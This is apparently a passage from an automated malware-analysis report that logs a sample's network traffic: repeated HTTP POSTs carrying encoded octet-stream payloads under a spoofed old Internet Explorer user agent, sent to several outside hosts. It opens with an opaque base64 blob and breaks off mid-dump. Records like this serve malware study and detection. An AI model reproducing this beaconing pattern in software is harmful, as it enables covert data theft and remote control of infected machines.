8eYLtOg7PBYCyNX4q24EN1sXW43wjFrKnD3NFWnVoX5PjD1+b1oiYecSBhL/0tiR5njHth4MZIxxVKtBvSEXIUeSqrRwPK3IPxO3QUOWynkri9uDZaEjM5gr8rVl/SPn9AFDd75sCqh/fsg1znyyhy1QH0tEzY+saQ21n0ioHCQmMM6wZIyb3lcYAGaCyZ0NnLdg5zjmXL7Po4x6/oVhxO8wY+rzGgUizx4CBnHnkT6LGD2UNIuuaMxM3XM1yLQx0yf4EX9QjCJ3p+UFhaAVvP8//UuiVB3IJUDdMy0IHvVxJiDEL46V177bLmFt558DXePDPszBP7V4MLPjGLmccTKWa0miGPucI7tzmGiImNMKDX7yAGeTO0udHaOERmuXR1oxcvrvPRILKfFR3paZYPTXe+MgcqTavT7+1wMMU1yoyH1i1OX6hqsoBNcDBsybpXrwuoUvjz/g/JGr7UXpEHDvROYwj43+60e8tEEWQY3q1ayCwKDYnIdKXxz52u0wAUwGZ3jV1d8/O1dHBN2w
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 524User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 53 52 2f 2f 53 46 44 6b 69 78 61 6e 6f 70 64 68 34 32 74 52 61 67 4f 67 4e 70 46 34 6b 66 4d 79 68 48 41 4a 5a 53 4d 31 41 32 44 38 49 32 43 30 50 6d 4a 6f 46 76 33 48 77 46 6c 49 55 6d 51 42 6e 35 54 72 32 6d 69 6d 35 77 6f 59 42 78 6a 4a 64 78 30 32 36 48 6c 42 53 4e 78 58 54 4f 35 76 5a 66 69 6f 78 64 56 62 59 6d 43 47 71 77 45 4f 36 33 6e 34 70 4c 61 35 30 75 47 31 7a 5a 30 30 52 6e 37 4e 32 67 42 58 70 57 71 4e 42 46 4e 4d 71 37 4c 56 37 67 61 4e 69 63 6b 46 43 2f 62 72 59 4b 51 6e 47 7a 49 51 45 56 53 46 71 35 62 42 51 6e 51 59 6f 78 4e 79 34 7a 41 35 64 33 59 69 31 37 79 2f 61 4d 75 67 37 4d 4a 2f 37 6f 52 79 37 56 74 37 4b 57 63 73 33 4b 2f 53 47 6a 6a 37 44 50 36 55 78 44 30 4f 6a 68 37 68 43 38 53 43 44 7a 4a 45 6c 33 38 35 51 47 6d 47 2b 6d 48 2f 62 72 52 74 45 5a 43 34 47 30 75 66 6d 61 38 4a 4d 67 42 49 57 32 50 6e 4b 51 47 6c 34 46 77 5a 59 66 42 66 4b 76 67 31 36 48 4f 4e 41 78 30 69 66 51 52 7a 75 75 4a 59 31 64 4d 42 6c 6a 73 6b 47 69 79 45 6c 4e 56 5a 49 79 66 57 50 34 6e 73 49 62 6d 31 77 46 4c 4a 41 57 4f 35 61 49 33 35 47 38 6a 4e 7a 59 32 42 41 69 39 46 53 58 6b 4b 6c 37 62 4f 2f 68 31 32 43 69 74 78 4e 41 43 69 4f 51 68 4d 44 4e 69 66 62 55 66 50 4a 6d 63 70 57 68 6f 30 31 30 5a 49 37 37 79 65 33 32 64 59 51 57 57 5a 6e 30 59 2b 61 2f 79 55 56 50 78 58 38 62 59 70 33 31 38 79 6d 32 31 74 74 37 75 54 68 65 79 4c 56 4e 75 54 47 69 56 6a 4b 36 6a 4c 54 2f 4b 68 67 36 45 79 66 70 42 33 78 76 57 6b 38 31 71 6c 53 33 47 75 2f 74 36 54 4c 49 67 37 2f 56 78 68 48 33 4b 36 70 52 69 66 65 35 50 6e 57 65 54 36 68 69 43 77 47 46 67 3d Data Ascii: SR//SFDkixanopdh42tRagOgNpF4kfMyhHAJZSM1A2D8I2C0PmJoFv3HwFlIUmQBn5Tr2mim5woYBxjJdx026HlBSNxXTO5vZfioxdVbYmCGqwEO63n4pLa50uG1zZ00Rn7N2gBXpWqNBFNMq7LV7gaNickFC/brYKQnGzIQEVSFq5bBQnQYoxNy4zA5d3Yi17y/aMug7MJ/7oRy7Vt7KWcs3K/SGjj7DP6UxD0Ojh7hC8SCDzJEl385QGmG+mH/brRtEZC4G0ufma8JMgBIW2PnKQGl4FwZYfBfKvg16HONAx0ifQRzuuJY1dMBljskGiyElNVZIyfWP4nsIbm1wFLJAWO5aI35G8jNzY2BAi9FSXkKl7bO/h12CitxNACiOQhMDNifbUfPJmcpWho010ZI77ye32dYQWWZn0Y+a/yUVPxX8bYp318ym21tt7uTheyLVNuTGiVjK6jLT/Khg6EyfpB3xvWk81qlS3Gu/t6TLIg7/VxhH3K6pRife5PnWeT6hiCwGFg=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 528User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jchysk.comCache-Control: no-cacheData Raw: 64 63 5a 46 61 43 52 58 59 78 59 72 30 77 77 59 76 37 69 32 64 76 65 64 46 51 37 63 66 6b 6f 77 6d 49 37 6a 63 4e 52 67 64 58 4b 6e 63 4f 6b 31 4a 69 33 78 6d 39 74 76 4a 4d 4c 44 5a 4d 39 43 59 70 35 73 34 63 4b 79 51 6a 35 61 36 54 6f 54 75 31 45 34 67 44 71 56 48 62 4e 7a 35 30 30 56 59 50 42 2b 64 77 7a 4c 46 71 6e 31 65 72 6a 65 42 4a 70 45 6f 6f 7a 4f 6f 70 43 66 55 33 50 4f 46 51 37 6f 54 34 6e 71 76 53 55 78 71 49 6c 6b 33 47 69 6e 36 73 62 77 79 2b 56 48 41 2b 51 39 53 63 42 45 30 72 37 77 74 44 35 49 53 50 64 4f 31 49 4f 44 71 66 31 50 50 57 67 56 70 62 5a 69 35 31 4b 69 72 33 4b 71 37 65 4e 41 52 66 48 34 35 6c 4c 47 69 79 56 52 38 4d 52 52 33 51 43 72 53 66 4e 49 56 59 50 44 78 48 2b 45 53 6d 64 32 6a 75 76 4d 43 5a 59 4a 73 38 6f 6d 76 75 41 34 33 69 42 7a 57 31 6a 71 77 66 38 54 6d 7a 4f 69 33 50 58 6c 32 53 7a 4c 37 51 31 4d 75 75 66 58 31 76 41 68 77 43 69 76 70 4a 48 56 73 74 66 49 64 45 4c 59 52 73 54 54 41 6f 77 6a 71 47 35 50 6d 2b 79 78 77 55 6c 62 32 77 31 33 79 71 7a 52 4a 78 38 47 49 6e 66 6f 4d 54 6d 4c 7a 64 78 71 67 32 66 37 31 42 39 34 76 70 7a 6c 6c 53 5a 70 73 59 62 4a 6c 4d 72 59 43 52 4b 37 55 76 2b 32 48 66 46 4c 38 75 50 52 7a 65 45 67 75 56 73 54 35 6b 61 2f 2f 67 4e 6c 50 57 37 69 49 58 59 41 41 66 65 45 70 64 31 42 6e 79 65 6e 32 55 43 72 65 4c 38 30 47 52 71 4a 7a 66 78 6a 44 53 66 67 73 61 6a 64 6e 64 48 58 45 53 35 31 37 4f 58 39 76 36 56 68 4e 4e 36 51 50 43 76 45 42 59 4b 6a 65 57 36 71 50 34 4c 59 39 59 6e 6a 4a 48 4d 67 33 49 39 37 61 38 2b 6a 73 33 42 2b 70 6e 30 4b 32 77 71 74 7a 4a 4d 32 6d 59 35 47 54 41 3d 3d Data Ascii: dcZFaCRXYxYr0wwYv7i2dvedFQ7cfkowmI7jcNRgdXKncOk1Ji3xm9tvJMLDZM9CYp5s4cKyQj5a6ToTu1E4gDqVHbNz500VYPB+dwzLFqn1erjeBJpEoozOopCfU3POFQ7oT4nqvSUxqIlk3Gin6sbwy+VHA+Q9ScBE0r7wtD5ISPdO1IODqf1PPWgVpbZi51Kir3Kq7eNARfH45lLGiyVR8MRR3QCrSfNIVYPDxH+ESmd2juvMCZYJs8omvuA43iBzW1jqwf8TmzOi3PXl2SzL7Q1MuufX1vAhwCivpJHVstfIdELYRsTTAowjqG5Pm+yxwUlb2w13yqzRJx8GInfoMTmLzdxqg2f71B94vpzllSZpsYbJlMrYCRK7Uv+2HfFL8uPRzeEguVsT5ka//gNlPW7iIXYAAfeEpd1Bnyen2UCreL80GRqJzfxjDSfgsajdndHXES517OX9v6VhNN6QPCvEBYKjeW6qP4LY9YnjJHMg3I97a8+js3B+pn0K2wqtzJM2mY5GTA==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nqks.comCache-Control: no-cacheData Raw: 6d 2b 6b 77 5a 6e 6d 34 76 68 61 58 78 48 68 4f 43 49 64 76 5a 52 4a 76 2b 77 35 58 5a 34 54 54 76 56 71 6c 46 77 53 4e 62 5a 36 33 7a 59 55 44 4c 46 35 2f 4b 36 4f 6a 53 2b 37 53 4b 72 4a 2b 2f 38 78 37 6f 66 4d 42 6c 75 2f 74 4a 37 33 46 4d 32 74 72 48 2b 32 79 7a 45 43 36 33 49 33 32 72 58 4b 42 55 76 32 34 2b 61 61 64 52 4d 58 65 51 33 47 46 52 31 37 54 47 57 56 66 61 4f 71 6c 4c 4e 41 7a 51 63 57 7a 77 33 6c 7a 41 73 69 48 76 48 6a 4e 32 42 66 42 48 70 34 5a 30 5a 75 45 72 68 4f 38 44 46 49 2b 6e 6c 62 67 39 4e 61 43 4f 5a 51 4d 49 45 6a 69 39 63 62 57 61 6f 6d 4d 50 47 64 61 35 66 2b 53 62 2b 31 57 43 65 51 5a 6a 67 4a 41 62 5a 74 39 32 70 6a 42 57 72 4f 6f 67 55 41 54 36 4e 5a 43 6c 51 51 43 53 50 6d 58 6c 32 4e 42 50 79 65 2f 73 5a 67 37 32 77 51 43 6e 42 71 79 49 67 56 73 63 41 6c 75 2f 66 6c 6c 4a 78 5a 48 32 35 69 38 33 70 47 63 6d 4d 75 77 6a 42 4b 73 56 66 2f 55 67 36 2f 69 76 67 55 6f 6c 74 4a 41 45 75 55 47 6d 51 42 73 4a 35 61 6d 57 55 56 4f 6e 48 45 62 43 79 51 72 45 4d 41 71 52 4f 53 72 79 68 35 56 6f 76 62 38 74 5a 73 37 79 55 2b 76 37 62 2b 62 45 52 64 78 72 6b 48 45 47 52 76 6a 78 6f 7a 79 4e 76 57 6c 57 37 31 61 70 49 37 58 58 64 48 73 4e 36 44 6c 68 39 6b 64 4d 58 4f 66 4a 73 45 50 38 76 72 50 4a 41 6a 34 62 42 64 33 2b 51 4f 79 70 33 67 6b 64 58 56 30 61 69 58 62 30 62 76 47 33 74 56 4e 62 43 6f 53 77 63 41 7a 53 4e 62 68 77 51 4d 66 68 34 53 43 65 78 67 50 63 6e 78 43 32 62 68 6f 48 31 70 73 4b 55 63 4b 65 63 4c 4c 6a 41 54 70 39 42 49 68 74 67 73 59 73 75 51 47 63 38 76 6b 4d 75 4d 77 74 77 57 36 4c 58 78 66 36 75 31 36 36 46 68 34 69 6c 31 53 58 51 35 79 33 43 63 70 39 2b 51 38 54 67 3d 3d Data Ascii: m+kwZnm4vhaXxHhOCIdvZRJv+w5XZ4TTvVqlFwSNbZ63zYUDLF5/K6OjS+7SKrJ+/8x7ofMBlu/tJ73FM2trH+2yzEC63I32rXKBUv24+aadRMXeQ3GFR17TGWVfaOqlLNAzQcWzw3lzAsiHvHjN2BfBHp4Z0ZuErhO8DFI+nlbg9NaCOZQMIEji9cbWaomMPGda5f+Sb+1WCeQZjgJAbZt92pjBWrOogUAT6NZClQQCSPmXl2NBPye/sZg72wQCnBqyIgVscAlu/fllJxZH25i83pGcmMuwjBKsVf/Ug6/ivgUoltJAEuUGmQBsJ5amWUVOnHEbCyQrEMAqROSryh5Vovb8tZs7yU+v7b+bERdxrkHEGRvjxozyNvWlW71apI7XXdHsN6Dlh9kdMXOfJsEP8vrPJAj4bBd3+QOyp3gkdXV0aiXb0bvG3tVNbCoSwcAzSNbhwQMfh4SCexgPcnxC2bhoH1psKUcKecLLjATp9BIhtgsYsuQGc8vkMuMwtwW6LXxf6u166Fh4il1SXQ5y3Ccp9+Q8Tg==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 78 6b 6f 4b 70 38 5a 6b 36 68 59 34 62 37 34 44 34 66 58 53 6f 65 6e 56 6b 33 6b 6d 4d 70 39 6d 57 72 56 42 76 75 59 36 70 50 54 56 44 48 34 33 61 70 51 4e 74 57 70 61 32 79 4e 64 4b 5a 51 58 2f 4c 6c 7a 50 45 5a 54 39 5a 74 72 75 42 76 52 69 4f 44 67 6b 6e 5a 68 66 4b 38 4e 41 51 51 41 7a 2f 6c 38 79 6e 4d 32 32 49 32 6c 39 47 79 4e 65 6f 6b 66 76 34 32 55 69 59 44 34 2b 75 4c 6f 41 45 32 53 48 56 6f 52 52 73 67 6f 46 76 41 47 6f 56 4c 67 77 63 31 32 74 4a 79 61 68 6a 69 6d 7a 39 30 6d 65 39 41 38 6d 55 64 69 58 5a 65 67 6c 39 35 33 79 4e 62 59 69 66 32 41 2f 66 54 56 65 69 37 68 39 4c 54 38 76 61 57 79 75 5a 69 54 37 38 33 67 39 6d 73 65 59 46 77 6f 70 62 53 73 44 54 7a 72 6d 4a 57 57 2f 72 61 6b 76 6e 58 6a 52 58 53 48 6a 2f 66 37 65 57 6b 2b 61 73 6e 61 4b 42 30 69 6d 53 76 61 36 51 47 31 52 4f 6d 34 50 65 79 31 4e 39 72 61 7a 45 39 64 42 64 4e 78 30 50 30 61 6c 72 31 7a 79 30 55 75 53 53 4d 30 5a 46 43 63 66 36 58 31 58 54 44 4f 49 62 59 57 50 38 41 77 33 49 4f 56 49 56 61 47 2f 75 6c 39 76 4a 33 39 38 6f 74 50 68 56 42 6d 39 2b 72 6d 65 41 37 75 52 58 51 4b 4e 77 38 64 44 31 4c 68 30 71 4f 59 47 2f 39 46 64 33 66 62 4d 65 62 69 42 48 73 45 65 6a 71 44 2f 6f 48 4c 69 74 34 71 4a 4d 69 52 4b 57 59 39 44 79 4f 6e 42 75 4d 44 4a 6b 65 64 38 32 66 37 4b 57 7a 76 32 36 31 6a 6c 32 63 64 6e 6e 71 43 68 5a 73 6b 46 64 39 52 69 71 45 72 2f 6c 30 37 41 78 77 32 53 71 70 67 31 6f 56 63 32 6e 6b 44 38 77 76 71 30 2f 30 39 79 79 57 63 56 42 4d 2f 54 56 55 75 4d 4d 71 66 58 4a 36 6e 6a 36 53 61 4e 32 78 37 5a 53 31 73 4b 2f 45 58 6d 6e 73 58 72 75 43 38 58 69 41 4d 4d 43 4c 2b 79 50 57 6a 4c 58 63 35 42 35 65 44 75 6e 49 4c 4b 4b 38 53 56 77 36 58 6e 6b 58 6c 31 64 78 66 76 33 6c 65 2f 49 6d 36 63 48 47 33 Data Ascii: xkoKp8Zk6hY4b74D4fXSoenVk3kmMp9mWrVBvuY6pPTVDH43apQNtWpa2yNdKZQX/LlzPEZT9ZtruBvRiODgknZhfK8NAQQAz/l8ynM22I2l9GyNeokfv42UiYD4+uLoAE2SHVoRRsgoFvAGoVLgwc12tJyahjimz90me9A8mUdiXZegl953yNbYif2A/fTVei7h9LT8vaWyuZiT783g9mseYFwopbSsDTzrmJWW/rakvnXjRXSHj/f7eWk+asnaKB0imSva6QG1ROm4Pey1N9razE9dBdNx0P0alr1zy0UuSSM0ZFCcf6X1XTDOIbYWP8Aw3IOVIVaG/ul9vJ398otPhVBm9+rmeA7uRXQKNw8dD1Lh0qOYG/9Fd3fbMebiBHsEejqD/oHLit4qJMiRKWY9DyOnBuMDJked82f7KWzv261jl2cdnnqChZskFd9RiqEr/l07Axw2Sqpg1oVc2nkD8wvq0/09yyWcVBM/TVUuMMqfXJ6nj6SaN2x7ZS1sK/EXmnsXruC8XiAMMCL+yPWjLXc5B5eDunILKK8SVw6XnkXl1dxfv3le/Im6cHG3
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.quadlock.comCache-Control: no-cacheData Raw: 4c 55 6c 57 6e 59 72 69 56 52 4a 56 38 37 6e 6c 37 58 43 49 67 6b 31 4d 6e 44 4d 36 58 66 33 48 58 6f 31 44 65 70 70 74 71 35 30 74 4c 34 67 73 61 48 75 4c 48 76 43 30 7a 51 2f 58 6b 50 44 52 67 42 6d 51 35 39 34 42 34 41 6f 71 77 78 66 4d 32 38 5a 4f 63 54 49 36 7a 58 6a 44 49 6d 6b 46 4c 6e 74 76 4d 6c 78 31 54 35 71 6a 61 65 6e 42 6f 39 42 2f 74 78 71 59 32 36 6f 4d 52 6c 65 2b 43 79 37 56 50 55 39 35 71 6c 79 76 71 70 42 31 61 56 32 51 36 31 67 5a 45 62 57 50 76 6f 59 72 58 7a 4d 65 34 44 32 67 61 43 35 34 30 30 55 4a 4b 39 38 57 6e 42 67 34 4b 50 58 53 71 72 55 50 70 62 52 79 5a 6c 7a 70 5a 31 5a 34 46 2f 4d 73 6c 48 31 67 36 68 36 2b 44 4f 6f 4d 36 77 6a 36 64 6d 59 4c 48 44 50 6e 6d 5a 79 72 4f 58 33 54 41 72 33 67 54 65 6a 52 34 56 73 4f 66 74 4b 78 70 6c 4f 62 4d 41 64 4f 47 50 6f 67 39 55 45 6c 30 74 4c 79 37 41 74 48 33 32 78 43 37 58 5a 69 4f 4a 58 68 54 46 52 57 6a 47 53 31 61 63 50 41 67 34 39 4f 30 38 46 53 78 65 62 6c 77 77 67 72 5a 39 71 49 59 42 45 72 66 66 6c 48 6b 78 45 67 75 5a 48 6a 33 6c 46 67 35 74 62 63 35 78 45 6c 44 30 31 79 6a 57 55 63 43 77 57 79 6f 6b 33 62 30 61 39 57 39 31 64 4d 61 59 64 61 65 73 68 2f 62 4b 69 6b 53 2b 75 6f 72 50 68 51 4e 44 68 58 51 70 78 42 70 58 59 51 48 62 7a 6d 68 55 62 30 50 77 72 46 53 6c 4a 54 7a 62 64 72 64 37 69 4b 66 59 68 64 6b 7a 39 46 79 56 66 68 78 58 35 6d 34 2b 4e 74 6a 53 61 6d 4c 59 52 78 4b 5a 53 33 69 30 4c 67 4b 41 35 4e 4c 6e 69 50 57 72 52 4c 50 75 42 33 74 35 54 6e 38 52 42 64 38 64 48 63 51 41 70 43 36 37 47 66 31 44 67 42 68 49 44 42 42 4f 35 6f 6b 38 67 2f 41 4b 70 74 73 65 38 46 41 57 49 7a 61 4d 2f 36 4c 35 45 4b 2f 4b 67 7a 38 79 71 77 50 67 35 63 6e 66 50 38 71 67 51 78 74 30 32 68 78 41 56 65 62 72 47 52 41 33 6e 48 49 77 3d 3d Data Ascii: LUlWnYriVRJV87nl7XCIgk1MnDM6Xf3HXo1Depptq50tL4gsaHuLHvC0zQ/XkPDRgBmQ594B4AoqwxfM28ZOcTI6zXjDImkFLntvMlx1T5qjaenBo9B/txqY26oMRle+Cy7VPU95qlyvqpB1aV2Q61gZEbWPvoYrXzMe4D2gaC5400UJK98WnBg4KPXSqrUPpbRyZlzpZ1Z4F/MslH1g6h6+DOoM6wj6dmYLHDPnmZyrOX3TAr3gTejR4VsOftKxplObMAdOGPog9UEl0tLy7AtH32xC7XZiOJXhTFRWjGS1acPAg49O08FSxeblwwgrZ9qIYBErfflHkxEguZHj3lFg5tbc5xElD01yjWUcCwWyok3b0a9W91dMaYdaesh/bKikS+uorPhQNDhXQpxBpXYQHbzmhUb0PwrFSlJTzbdrd7iKfYhdkz9FyVfhxX5m4+NtjSamLYRxKZS3i0LgKA5NLniPWrRLPuB3t5Tn8RBd8dHcQApC67Gf1DgBhIDBBO5ok8g/AKptse8FAWIzaM/6L5EK/Kgz8yqwPg5cnfP8qgQxt02hxAVebrGRA3nHIw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 56 68 52 4a 45 41 54 66 31 42 59 7a 46 52 59 70 48 39 35 39 2f 64 66 51 33 50 34 38 68 49 7a 41 65 4f 53 73 4f 7a 31 4a 4d 30 4c 62 68 2f 75 78 55 6b 42 6a 36 43 6e 51 68 55 70 67 51 2f 4b 7a 65 71 38 49 46 4c 68 2b 6c 6b 71 77 38 58 49 46 32 2f 4b 35 69 62 78 77 69 74 57 51 65 72 6b 66 4d 39 77 30 51 31 68 75 75 79 75 67 66 37 56 54 63 62 70 5a 39 56 45 39 30 49 51 6f 4f 4b 4c 41 6e 39 6a 52 54 45 37 4e 69 62 5a 6a 57 68 54 32 65 78 54 66 6d 2f 73 77 6d 44 39 78 37 4c 61 7a 59 67 63 6e 43 6b 34 35 79 6c 2b 30 45 35 44 2f 59 4a 4d 33 65 36 45 4c 56 6d 6b 36 4e 52 65 4a 35 47 6a 2b 79 4e 66 65 61 2b 7a 56 54 34 39 2f 4f 31 75 56 41 72 42 78 6c 5a 48 46 4a 5a 5a 41 48 33 33 6d 79 34 46 57 2f 6c 4a 39 56 54 6e 77 62 51 36 79 53 63 50 6f 72 65 48 4e 6b 6f 75 77 51 33 65 4b 50 4e 41 6c 7a 62 52 75 2b 6c 2f 70 73 30 6e 58 4b 67 53 53 77 31 45 66 4b 59 36 4d 65 50 6e 68 50 65 63 7a 4f 51 37 69 2f 47 77 76 47 66 49 35 57 30 48 73 44 5a 64 2b 57 55 58 74 41 59 32 45 32 38 45 4f 75 78 54 70 6e 4b 37 56 4c 39 74 35 56 6e 49 45 6e 4c 43 6e 79 41 45 32 68 32 68 33 42 76 64 4c 2b 39 58 35 79 46 2b 67 78 58 66 48 43 41 46 67 71 50 64 73 64 2b 32 32 78 50 54 41 34 4f 61 63 6d 30 67 39 64 2b 43 79 49 51 64 39 4f 4a 30 63 55 58 31 70 73 57 35 64 64 52 57 42 61 6a 51 42 65 57 2b 45 79 32 54 6e 39 62 52 65 46 4c 35 4f 41 53 57 46 4b 50 7a 37 76 36 53 4e 75 4a 35 52 6d 61 32 31 59 73 38 54 75 6c 53 59 77 6e 77 4f 73 77 2b 77 4a 70 30 67 63 76 4b 7a 6a 34 63 61 6d 53 78 51 67 35 4f 73 47 42 76 47 37 73 37 77 7a 45 6d 34 54 6f 5a 31 31 75 6b 66 72 71 62 59 4c 47 68 54 52 65 4f 78 4b 34 4d 6a 76 4d 4e 63 78 56 48 78 64 6f 7a 67 62 6d 61 51 5a 7a 5a 2b 41 71 6e 2f 71 5a 43 6a 64 77 54 6a 4d 56 45 34 35 66 4c 37 53 71 33 65 75 37 32 6d 6d 37 34 34 53 4b 57 73 75 77 3d 3d Data Ascii: VhRJEATf1BYzFRYpH959/dfQ3P48hIzAeOSsOz1JM0Lbh/uxUkBj6CnQhUpgQ/Kzeq8IFLh+lkqw8XIF2/K5ibxwitWQerkfM9w0Q1huuyugf7VTcbpZ9VE90IQoOKLAn9jRTE7NibZjWhT2exTfm/swmD9x7LazYgcnCk45yl+0E5D/YJM3e6ELVmk6NReJ5Gj+yNfea+zVT49/O1uVArBxlZHFJZZAH33my4FW/lJ9VTnwbQ6yScPoreHNkouwQ3eKPNAlzbRu+l/ps0nXKgSSw1EfKY6MePnhPeczOQ7i/GwvGfI5W0HsDZd+WUXtAY2E28EOuxTpnK7VL9t5VnIEnLCnyAE2h2h3BvdL+9X5yF+gxXfHCAFgqPdsd+22xPTA4Oacm0g9d+CyIQd9OJ0cUX1psW5ddRWBajQBeW+Ey2Tn9bReFL5OASWFKPz7v6SNuJ5Rma21Ys8TulSYwnwOsw+wJp0gcvKzj4camSxQg5OsGBvG7s7wzEm4ToZ11ukfrqbYLGhTReOxK4MjvMNcxVHxdozgbmaQZzZ+Aqn/qZCjdwTjMVE45fL7Sq3eu72mm744SKWsuw==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 44 6d 37 39 64 31 66 4f 41 52 65 67 31 61 36 6f 52 68 63 38 52 71 43 6d 73 42 47 4e 48 62 69 58 65 78 64 4f 36 76 62 5a 46 39 69 54 32 6c 6c 70 55 71 54 4d 77 4b 5a 44 6e 6b 33 52 39 58 4b 63 75 66 2f 51 6d 76 59 45 51 2b 48 43 34 6e 55 68 49 6a 76 72 41 67 4d 6f 47 42 79 57 68 30 4e 55 58 79 64 75 31 4b 33 7a 67 6a 76 57 4c 32 79 46 59 33 63 68 7a 69 2f 37 45 49 59 55 53 64 50 4d 2b 67 72 67 37 57 2b 53 66 4b 31 75 53 61 71 33 32 58 43 4e 69 45 73 75 4a 67 63 77 6c 33 2b 37 75 42 52 65 6e 36 4c 63 5a 6e 4b 41 69 31 79 4c 32 78 59 48 72 4e 7a 73 37 33 4b 6a 6b 43 77 75 39 57 4e 6d 59 55 43 78 5a 4d 50 58 53 76 4c 71 38 66 4e 65 4b 2b 2f 6e 51 72 4c 30 5a 37 71 30 77 61 76 6f 78 4a 6d 39 7a 73 54 49 69 77 74 79 45 75 69 34 69 71 36 56 63 76 72 61 30 4c 78 51 73 4f 78 50 69 7a 35 6c 55 30 4c 32 6c 74 52 4c 68 52 35 41 37 2b 44 53 79 5a 6b 39 55 79 4b 78 41 34 39 52 56 63 53 6e 54 69 75 32 6c 38 6f 4f 56 2f 72 42 58 46 6c 66 70 51 65 39 4c 30 58 63 2f 72 50 54 2b 4b 68 4c 62 74 53 6b 36 79 6d 56 54 66 2f 66 78 2b 43 6f 2b 36 48 64 63 59 56 69 45 36 57 61 76 79 32 64 6d 4b 79 39 71 43 37 6d 38 45 4e 2f 73 41 6c 69 53 55 4c 58 38 58 73 48 4c 6b 6f 66 43 6a 70 54 75 4b 63 36 62 43 72 79 38 48 53 6a 6c 53 54 75 2f 6d 46 6b 43 34 6b 6d 55 79 58 39 37 39 34 36 48 69 70 41 51 6d 51 7a 57 65 72 2f 51 47 6c 68 37 6a 4d 64 34 75 4f 36 33 51 32 4b 41 6b 4e 58 35 2f 45 6c 57 54 2b 75 54 63 77 41 31 57 4a 4b 43 36 65 4b 49 66 47 6a 50 4d 58 73 63 57 4c 50 42 42 56 58 70 4e 76 55 53 63 35 55 7a 39 6e 78 65 4e 49 65 2b 39 36 65 37 62 70 42 70 36 7a 52 49 62 53 36 53 7a 52 4c 53 51 3d 3d Data Ascii: Dm79d1fOAReg1a6oRhc8RqCmsBGNHbiXexdO6vbZF9iT2llpUqTMwKZDnk3R9XKcuf/QmvYEQ+HC4nUhIjvrAgMoGByWh0NUXydu1K3zgjvWL2yFY3chzi/7EIYUSdPM+grg7W+SfK1uSaq32XCNiEsuJgcwl3+7uBRen6LcZnKAi1yL2xYHrNzs73KjkCwu9WNmYUCxZMPXSvLq8fNeK+/nQrL0Z7q0wavoxJm9zsTIiwtyEui4iq6Vcvra0LxQsOxPiz5lU0L2ltRLhR5A7+DSyZk9UyKxA49RVcSnTiu2l8oOV/rBXFlfpQe9L0Xc/rPT+KhLbtSk6ymVTf/fx+Co+6HdcYViE6Wavy2dmKy9qC7m8EN/sAliSULX8XsHLkofCjpTuKc6bCry8HSjlSTu/mFkC4kmUyX97946HipAQmQzWer/QGlh7jMd4uO63Q2KAkNX5/ElWT+uTcwA1WJKC6eKIfGjPMXscWLPBBVXpNvUSc5Uz9nxeNIe+96e7bpBp6zRIbS6SzRLSQ==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 56 68 52 4a 45 41 54 66 31 42 59 7a 46 52 59 70 48 39 35 39 2f 64 66 51 33 50 34 38 68 49 7a 41 65 4f 53 73 4f 7a 31 4a 4d 30 4c 62 68 2f 75 78 55 6b 42 6a 36 43 6e 51 68 55 70 67 51 2f 4b 7a 65 71 38 49 46 4c 68 2b 6c 6b 71 77 38 58 49 46 32 2f 4b 35 69 62 78 77 69 74 57 51 65 72 6b 66 4d 39 77 30 51 31 68 75 75 79 75 67 66 37 56 54 63 62 70 5a 39 56 45 39 30 49 51 6f 4f 4b 4c 41 6e 39 6a 52 54 45 37 4e 69 62 5a 6a 57 68 54 32 65 78 54 66 6d 2f 73 77 6d 44 39 78 37 4c 61 7a 59 67 63 6e 43 6b 34 35 79 6c 2b 30 45 35 44 2f 59 4a 4d 33 65 36 45 4c 56 6d 6b 36 4e 52 65 4a 35 47 6a 2b 79 4e 66 65 61 2b 7a 56 54 34 39 2f 4f 31 75 56 41 72 42 78 6c 5a 48 46 4a 5a 5a 41 48 33 33 6d 79 34 46 57 2f 6c 4a 39 56 54 6e 77 62 51 36 79 53 63 50 6f 72 65 48 4e 6b 6f 75 77 51 33 65 4b 50 4e 41 6c 7a 62 52 75 2b 6c 2f 70 73 30 6e 58 4b 67 53 53 77 31 45 66 4b 59 36 4d 65 50 6e 68 50 65 63 7a 4f 51 37 69 2f 47 77 76 47 66 49 35 57 30 48 73 44 5a 64 2b 57 55 58 74 41 59 32 45 32 38 45 4f 75 78 54 70 6e 4b 37 56 4c 39 74 35 56 6e 49 45 6e 4c 43 6e 79 41 45 32 68 32 68 33 42 76 64 4c 2b 39 58 35 79 46 2b 67 78 58 66 48 43 41 46 67 71 50 64 73 64 2b 32 32 78 50 54 41 34 4f 61 63 6d 30 67 39 64 2b 43 79 49 51 64 39 4f 4a 